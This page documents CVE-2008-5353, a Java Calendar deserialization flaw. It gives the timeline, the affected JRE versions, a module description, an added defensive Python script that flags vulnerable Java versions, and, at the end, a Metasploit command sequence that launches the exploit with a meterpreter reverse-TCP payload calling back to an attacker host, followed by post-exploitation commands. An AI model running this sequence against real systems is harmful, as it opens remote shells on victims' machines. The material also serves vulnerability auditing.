Timeline :

Vulnerability reported by Sami Koivu on 2008-08-01
Vulnerability fixed by Sun on 2008-12-03
PoC provided on 2009-05-19
Metasploit PoC provided by hdm on 2009-06-16

    PoC provided by :

Sami Koivu
sf
hdm

    Reference(s) :

CVE-2008-5353

    Affected version(s) :

JRE & JDK version 6 prior to update 11
JRE & JDK version 5 prior to update 16
JRE & JDK version 1.4.2_18 and prior

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 10

    Description :

This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
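A version check for auditing hosts against the affected ranges given in the Description above, as an added example that is not part of the original post or of the Metasploit module. The function names and the sample inventory are constructed for illustration, and release families the page does not name are reported as unknown.

```python
import re

# Last affected update per release family, from the Description above.
LAST_AFFECTED_UPDATE = {
    (1, 6, 0): 10,  # JDK/JRE 6 Update 10 and earlier
    (1, 5, 0): 16,  # JDK/JRE 5.0 Update 16 and earlier
    (1, 4, 2): 18,  # SDK/JRE 1.4.2_18 and earlier
}
NOT_AFFECTED_FAMILIES = {(1, 3, 1)}  # stated explicitly in the Description

# Matches "1.6.0_10", "1.6.0_10-b33" and "1.5.0" inside `java -version` output.
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:_(\d+))?")

def parse_java_version(text):
    """Return ((major, minor, micro), update), or None if no version is found."""
    m = VERSION_RE.search(text)
    if m is None:
        return None
    family = tuple(int(g) for g in m.group(1, 2, 3))
    update = int(m.group(4)) if m.group(4) else 0  # "1.6.0" is update 0
    return family, update

def cve_2008_5353_status(text):
    """Classify a version string as 'affected', 'not affected' or 'unknown'."""
    parsed = parse_java_version(text)
    if parsed is None:
        return "unknown"
    family, update = parsed
    if family in NOT_AFFECTED_FAMILIES:
        return "not affected"
    if family in LAST_AFFECTED_UPDATE:
        return "affected" if update <= LAST_AFFECTED_UPDATE[family] else "not affected"
    return "unknown"  # family not named on this page

def audit(inventory):
    """Map each host to its status given {host: `java -version` first line}."""
    return {host: cve_2008_5353_status(line) for host, line in inventory.items()}

# Constructed sample inventory (hypothetical host names).
SAMPLE_INVENTORY = {
    "ws-01": 'java version "1.6.0_10"',
    "ws-02": 'java version "1.6.0_11"',
    "ws-03": 'java version "1.5.0_16-b02"',
    "ws-04": 'java version "1.4.2_19"',
    "ws-05": 'java version "1.3.1_20"',
}

if __name__ == "__main__":
    for host, status in sorted(audit(SAMPLE_INVENTORY).items()):
        print(f"{host}: {status}")
```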

    Commands :

use exploit/multi/browser/java_calendar_deserialize
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig